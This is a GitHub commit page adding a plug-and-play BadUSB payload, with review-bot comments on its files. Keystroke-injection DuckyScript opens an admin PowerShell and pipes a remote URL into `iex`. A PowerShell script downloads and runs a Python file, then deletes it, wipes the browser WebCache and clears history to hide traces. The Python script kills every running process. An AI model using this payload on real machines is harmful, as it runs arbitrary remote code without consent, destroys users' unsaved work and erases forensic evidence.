Merge pull request #144 from aleff-github/patch-11

Close All Applications
pull/178/head
Kalani Helekunihi 2023-06-12 14:54:57 -04:00 committed by GitHub
commit 4b16278abd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 92 additions and 0 deletions

@ -0,0 +1,28 @@
# Close All Applications - BADUSB ✅
A script used to close all target open applications.
🟢 **Plug-And-Play** 🟢
**Category**: Execution
## Description
A script used to close all target open applications.
Opens PowerShell hidden, download a Python script, execute it, remove Python script downloaded, delete powershell history.
## Getting Started
### Dependencies
* Internet Connection
* Windows 10,11
### Executing program
* Plug in your device
### Settings
- No settings - Plug-And-Play
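Review bot: The sentence under "## Description" does not match what the other files in this commit do. It says "Opens PowerShell hidden", but nothing in the DuckyScript file requests a hidden window, and it lists only script removal and history deletion, while the PowerShell file also deletes everything under `WebCache\*` and the Python file calls `terminate()` on every process returned by `psutil.process_iter()`, not only on applications. State those effects plainly (unsaved work is lost, the web cache is wiped), list Python and psutil under "### Dependencies" since `& python $savePath` and `import psutil` need them, and drop the duplicate of the description line under the title.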

@ -0,0 +1,18 @@
# Download Python script
# Reply $scriptUrl with YOUR LINK. The Payload should be script.py
$scriptUrl = "YOUR_END_USER_LINK_WITH_PAYLOAD"
$savePath = "$env:temp\script.py"
(New-Object System.Net.WebClient).DownloadFile($scriptUrl, $savePath)
# Execute Python script
& python $savePath
# Delete the downloaded script
Remove-Item $savePath
# Clear the download history from the system's web cache
Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force
# Clear the PowerShell command history
Clear-History
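Review bot: The `Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force` line deletes the user's whole web cache, which is unrelated to the file this script saved to `$env:temp\script.py` and is not mentioned in the README; remove it or document it as a side effect. Also, nothing checks that `DownloadFile` succeeded or what it fetched before `& python $savePath` runs it, and "Reply" in the second comment line should read "Replace".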

@ -0,0 +1,34 @@
REM #####################################################
REM # |
REM # Title : Close All Applications |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM #####################################################
REM Plug-And-Play
REM
REM 1. Open a powershell
REM 2. Download a Python script
REM 3. Execute it
REM 4. Remove Python script downloaded
REM 5. Delete powershell history
REM
REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
DEFINE POWERSHELL_CODE example.com
DELAY 2000
GUI x
DELAY 250
REPEAT 10 DOWNARROW
ENTER
DELAY 1000
REPEAT 2 TAB
ENTER
DELAY 2000
STRING irm POWERSHELL_CODE | iex
ENTER
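Review bot: The REM header does not describe this file. Steps 2 to 5 list what the PowerShell script does rather than what these keystrokes do, the note says the payload "should be close_all_app.ps1" while the PowerShell file's own comment says "The Payload should be script.py", and "Reply with YOUR LINK" never names `DEFINE POWERSHELL_CODE` as the value to change. Reword it so it says which file each link must point to, use "Replace", and state in the header that `irm POWERSHELL_CODE | iex` runs whatever that URL returns at the moment it is typed.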

@ -0,0 +1,12 @@
try:
import psutil
except:
import os
os.system("pip install psutil")
import psutil
for process in psutil.process_iter():
try:
process.terminate()
except:
pass
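Review bot: Both `except:` clauses are bare. The one around `import psutil` treats any failure as a missing module and then runs `os.system("pip install psutil")`, an unpinned install at run time whose exit status is never checked, so the second `import psutil` can still raise. Use `except ImportError:` there and document psutil as a dependency instead of installing it from the script. The one inside the loop discards every error from `process.terminate()`; catch `psutil.Error` so unrelated exceptions are not hidden. The loop also covers every process, not only applications, which the file should say in a comment.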